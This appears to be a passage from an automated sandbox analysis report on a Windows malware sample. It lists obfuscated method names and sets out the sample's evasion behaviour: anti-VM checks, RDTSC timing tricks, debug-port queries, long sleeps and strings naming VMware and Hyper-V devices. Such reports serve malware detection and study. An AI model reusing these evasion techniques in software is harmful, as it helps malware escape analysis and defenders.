              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, sWtfTvoZJQoijAEbp3.csHigh entropy of concatenated method names: 'nJIcKGaJOo', 'gD8cfRUFa6', 'YwociolUoZ', 'ANPcRphJsk', 'YhXcpT12bp', 'VsUc4cQLKq', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, A84fLPSIsCr4pNr2e1.csHigh entropy of concatenated method names: 'CqZw6peOhm', 'h1NwdADq3d', 'kWdwgNtrr6', 'tKZwb49V96', 'TDGw0B3Qdo', 'LOewkZkmgP', 'ra4wxwQchy', 'SLewmQL4wR', 'b5KwMJXskU', 'ocHwJY6SVD'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, HxZ91e2qtRrpVHMmHE.csHigh entropy of concatenated method names: 'JvnY22v44Q', 'TfyY8GdUjx', 'cipcAcUgVM', 'bJMcHogVH2', 'WyLYh4DXo0', 'ArEY1Lxfc2', 'rVNYQyA8Yf', 'LJLYphIsE6', 'iReYS5y7WR', 'wcgYOOMoiI'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, NByB4dfTi3kR926o21.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'LORUajo9pN', 'nrJU8V4K0Q', 'xAMUzO6UGU', 'ieDlApofjr', 'YhylHKFY4A', 'kUYlU7dwQK', 'S33llmTWk8', 'LWWWSfiQgQOmjK7YI4v'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, yFkgMbnRXbdivPfDnN.csHigh entropy of concatenated method names: 'fXwcDiSmwy', 'RoocCmVKfm', 'dEhcobuAXj', 'giscy5PCA6', 'gD1cIoMu18', 'moncw3GYoS', 'MWrcZIjBpA', 'k79cVKkSEp', 'F7pcBw8mfL', 'RdMcuUBj5d'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, xxcXVGtMuD6epI0GiVX.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'D3rPp7pLnQ', 'CXRPS8MRun', 'L4dPOWF8fF', 'QVDPjSYdFU', 'ocXPX09tlX', 'Y3RPLU0xqI', 'e3dP38nnfU'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, lD2VpmLwy74UUFOu8Q.csHigh entropy of concatenated method names: 'zBlIex2kgA', 'TTkICLn9DY', 'd5lIyBkFPG', 'nT5IwTxQZD', 'fHtIZx4k1j', 'l7qyXvwF1t', 'PGUyLqH89g', 'QLuy38NPXM', 'HMuy2VcCdq', 'BI5yaHP11i'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, LbokTxtwlaCQP5t1Y5j.csHigh entropy of concatenated method names: 'S3it6vBg5B', 'tJctdRrX3S', 'QW0tgc8Inr', 'URQtbg3XE7', 'enlt01JULC', 'UT7tkkyNuM', 'zawtxrUOQ0', 'Jottmcx0vk', 'tJqtM4nx1u', 'OjFtJKELUR'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, oDbClXHY0rOWGmbvPY.csHigh entropy of concatenated method names: 'HPWwDrRFWb', 'iFawoXTHEO', 'zdewIAQtPG', 'MeQI8e8rFH', 'BmKIzethpY', 'LWJwATbDpJ', 'gD3wHMVGsI', 'hwTwUqKga7', 'dGJwl0gbRu', 'gJGw5AVq9s'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, fQsIIlXm3Yrb2eUDWF.csHigh entropy of concatenated method names: 'zlNCpIs07c', 'Ex0CSYgWDB', 'eCHCOlupMr', 'FcYCj8nsVG', 'cu0CXYg4jb', 'zX6CL2R0pq', 'e0mC3dNydv', 'R1bC2umg2C', 'jiCCa0HSsm', 'mn8C8moeUO'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, GEAuDLzPxjeVJtEtEV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oVrt9BkpYt', 'GgrtseS0Z4', 'Ae9tFE8YS0', 'PbTtYjNOlk', 'B4GtciECjo', 'qCltt0d9Hi', 'O6RtPOoLKp'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, ARLosMUu9ux5s4xeIQ.csHigh entropy of concatenated method names: 'Dr8y0bg4Hl', 'WXKyxwavvr', 'pIUoip4Wo3', 'PFQoRf85If', 'nVto47Tmty', 'ISooWqFtuC', 'wJRo7Ydcsq', 'msGorbEwew', 'IWooGJkW7V', 'p1hoq830g3'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, G8Ku1BusrwriixUXvf.csHigh entropy of concatenated method names: 'Dispose', 'TvrHaJCQ1p', 'hEcUfxi1e2', 'bo9nnr8ccn', 'yivH8a6WcD', 'qTJHzNAtOH', 'ProcessDialogKey', 'bFMUAv62VB', 'KSPUHS0cUD', 'xRsUUTgL5X'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, XZbuRmxnN4Wcbhfseq.csHigh entropy of concatenated method names: 'p3AobOLVmp', 'RJookTZ4DL', 'epsomG7uiO', 'fPOoMRkb32', 'keVosOXdGP', 'RUToFSapRT', 'tbSoY0UU0b', 'wgAocmN773', 'yuaotoAwpp', 'yafoPohyx1'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, loA94X8dLam0BqsKKi.csHigh entropy of concatenated method names: 'p3otHQ0nPa', 'iWatld1nL8', 'QdZt5Muccx', 'mSQtD9kPMN', 'IBUtClP6bA', 'TRbtyZp79I', 'wkAtII4tQf', 'bcec3uH7gj', 'MOJc2IZ33N', 'yOQcakq7Ky'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, j6fOLPhmGRO9utyHLj.csHigh entropy of concatenated method names: 'mPUgYaX1E', 'm5Db8RTXj', 'xepkaNjoB', 'KjhxDue0F', 'wYSMTm35W', 'HR0JHBagp', 'UP7A1n27KtoA8nlv3E', 'BVJdrnu5MoCBUv79dI', 'fXvcC1uce', 'mFMPlcOp6'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, sCfYWWat39XY9HRk8e.csHigh entropy of concatenated method names: 'JsJ9mBHmrh', 'eEj9MPk3Lr', 'auU9KBAPm5', 'MA89fDSb3E', 'kVt9R3VjKZ', 'rFA94NkOYh', 'gEu97BwJJ2', 'yKl9r2LDAS', 'siL9qouSRo', 'GwC9h036K9'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, nwSOv7QdTPQVDnqvB5.csHigh entropy of concatenated method names: 'YFIIODs1Qq', 'eMrIjPR59C', 'CWUIXJJclv', 'ToString', 'b1EILg492q', 'dhHI3YO57p', 'fPURABtZkDkJGDkukuF', 'VNT54Ht2aG4SYgCikQ0'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, AC6LD60IT9CHcXjx6o.csHigh entropy of concatenated method names: 'UBkHww0qQk', 'YHJHZlGipT', 'wqbHByvlAW', 'YyTHuP0E02', 'lMBHsTxD5S', 'rrFHFIeKN0', 'KfssLM3mfNp9xYmpi7', 'YkOdMoqbDQdll6TluN', 'kBfHBDxHoLg4aO1GCk', 'hiaHHpuPGZ'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, L2MZqe5X1hqSn78nu9.csHigh entropy of concatenated method names: 'BXNlelgRv2', 'e5KlDvYpS9', 'MTplCZsji2', 'hH9loHR14V', 'mMulyl8D83', 'xF9lIapcck', 'heslwdS87o', 'U7vlZGteKq', 'zIUlVIXyTG', 'vXqlBfkOaL'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, sWtfTvoZJQoijAEbp3.csHigh entropy of concatenated method names: 'nJIcKGaJOo', 'gD8cfRUFa6', 'YwociolUoZ', 'ANPcRphJsk', 'YhXcpT12bp', 'VsUc4cQLKq', 'Next', 'Next', 'Next', 'NextBytes'
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: AB2hQJZ77ipdWem.exe PID: 7408, type: MEMORYSTR
              Switches to a custom stack to bypass stack traces
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0774
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD8A4
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
              Source: C:\Windows\SysWOW64\cscript.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
              Source: C:\Windows\SysWOW64\cscript.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0774
              Source: C:\Windows\SysWOW64\cscript.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
              Source: C:\Windows\SysWOW64\cscript.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
              Source: C:\Windows\SysWOW64\cscript.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
              Source: C:\Windows\SysWOW64\cscript.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
              Source: C:\Windows\SysWOW64\cscript.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
              Source: C:\Windows\SysWOW64\cscript.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD8A4
              Source: C:\Windows\SysWOW64\cscript.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeRDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 27B9904 second address: 27B990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 27B9B6E second address: 27B9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeMemory allocated: 1660000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeMemory allocated: 3110000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeMemory allocated: 5110000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeMemory allocated: 7E50000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeMemory allocated: 7A70000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeMemory allocated: 8E50000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeMemory allocated: 9E50000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_00409AA0 rdtsc 3_2_00409AA0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 5165Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 4771Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 880Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 869Jump to behavior
              Source: C:\Windows\SysWOW64\cscript.exeWindow / User API: threadDelayed 6086Jump to behavior
              Source: C:\Windows\SysWOW64\cscript.exeWindow / User API: threadDelayed 3409Jump to behavior
              Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_4-13946
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeAPI coverage: 1.6 %
              Source: C:\Windows\SysWOW64\cscript.exeAPI coverage: 1.6 %
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe TID: 7428Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 7936Thread sleep count: 5165 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 7936Thread sleep time: -10330000s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 7936Thread sleep count: 4771 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 7936Thread sleep time: -9542000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\cscript.exe TID: 7836Thread sleep count: 6086 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\cscript.exe TID: 7836Thread sleep time: -12172000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\cscript.exe TID: 7836Thread sleep count: 3409 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\cscript.exe TID: 7836Thread sleep time: -6818000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_00632674 GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,GetLastError,__alloca_probe_16,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose,5_2_00632674
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: explorer.exe, 00000004.00000002.3826801349.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
              Source: explorer.exe, 00000004.00000000.1389830128.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: explorer.exe, 00000004.00000003.2287668154.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
              Source: explorer.exe, 00000004.00000003.3076522967.000000000927B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
              Source: explorer.exe, 00000004.00000000.1389830128.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00=
              Source: explorer.exe, 00000004.00000003.3076522967.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3827556743.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: explorer.exe, 00000004.00000002.3826801349.00000000091FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: explorer.exe, 00000004.00000002.3826801349.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: explorer.exe, 00000004.00000000.1389830128.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
              Source: explorer.exe, 00000004.00000003.2287668154.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 00000004.00000000.1389830128.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 00000004.00000003.3076522967.000000000927B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_00409AA0 rdtsc 3_2_00409AA0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0040ACE0 LdrLoadDll,3_2_0040ACE0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0062AA82 LoadLibraryW,GetProcAddress,FreeLibrary,5_2_0062AA82
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01180115 mov eax, dword ptr fs:[00000030h]3_2_01180115
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0116A118 mov ecx, dword ptr fs:[00000030h]3_2_0116A118
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0116A118 mov eax, dword ptr fs:[00000030h]3_2_0116A118
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0116A118 mov eax, dword ptr fs:[00000030h]3_2_0116A118
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0116A118 mov eax, dword ptr fs:[00000030h]3_2_0116A118
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0116E10E mov eax, dword ptr fs:[00000030h]3_2_0116E10E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0116E10E mov ecx, dword ptr fs:[00000030h]3_2_0116E10E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0116E10E mov eax, dword ptr fs:[00000030h]3_2_0116E10E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0116E10E mov eax, dword ptr fs:[00000030h]3_2_0116E10E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0116E10E mov ecx, dword ptr fs:[00000030h]3_2_0116E10E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0116E10E mov eax, dword ptr fs:[00000030h]3_2_0116E10E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0116E10E mov eax, dword ptr fs:[00000030h]3_2_0116E10E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0116E10E mov ecx, dword ptr fs:[00000030h]3_2_0116E10E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0116E10E mov eax, dword ptr fs:[00000030h]3_2_0116E10E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0116E10E mov ecx, dword ptr fs:[00000030h]3_2_0116E10E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F0124 mov eax, dword ptr fs:[00000030h]3_2_010F0124
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01158158 mov eax, dword ptr fs:[00000030h]3_2_01158158
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01154144 mov eax, dword ptr fs:[00000030h]3_2_01154144
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01154144 mov eax, dword ptr fs:[00000030h]3_2_01154144
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01154144 mov ecx, dword ptr fs:[00000030h]3_2_01154144
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01154144 mov eax, dword ptr fs:[00000030h]3_2_01154144
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01154144 mov eax, dword ptr fs:[00000030h]3_2_01154144
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C6154 mov eax, dword ptr fs:[00000030h]3_2_010C6154
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C6154 mov eax, dword ptr fs:[00000030h]3_2_010C6154
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010BC156 mov eax, dword ptr fs:[00000030h]3_2_010BC156
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01194164 mov eax, dword ptr fs:[00000030h]3_2_01194164
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01194164 mov eax, dword ptr fs:[00000030h]3_2_01194164
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114019F mov eax, dword ptr fs:[00000030h]3_2_0114019F
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114019F mov eax, dword ptr fs:[00000030h]3_2_0114019F
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114019F mov eax, dword ptr fs:[00000030h]3_2_0114019F
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114019F mov eax, dword ptr fs:[00000030h]3_2_0114019F
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01100185 mov eax, dword ptr fs:[00000030h]3_2_01100185
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01164180 mov eax, dword ptr fs:[00000030h]3_2_01164180
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01164180 mov eax, dword ptr fs:[00000030h]3_2_01164180
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010BA197 mov eax, dword ptr fs:[00000030h]3_2_010BA197
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010BA197 mov eax, dword ptr fs:[00000030h]3_2_010BA197
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010BA197 mov eax, dword ptr fs:[00000030h]3_2_010BA197
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0117C188 mov eax, dword ptr fs:[00000030h]3_2_0117C188
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0117C188 mov eax, dword ptr fs:[00000030h]3_2_0117C188
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113E1D0 mov eax, dword ptr fs:[00000030h]3_2_0113E1D0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113E1D0 mov eax, dword ptr fs:[00000030h]3_2_0113E1D0
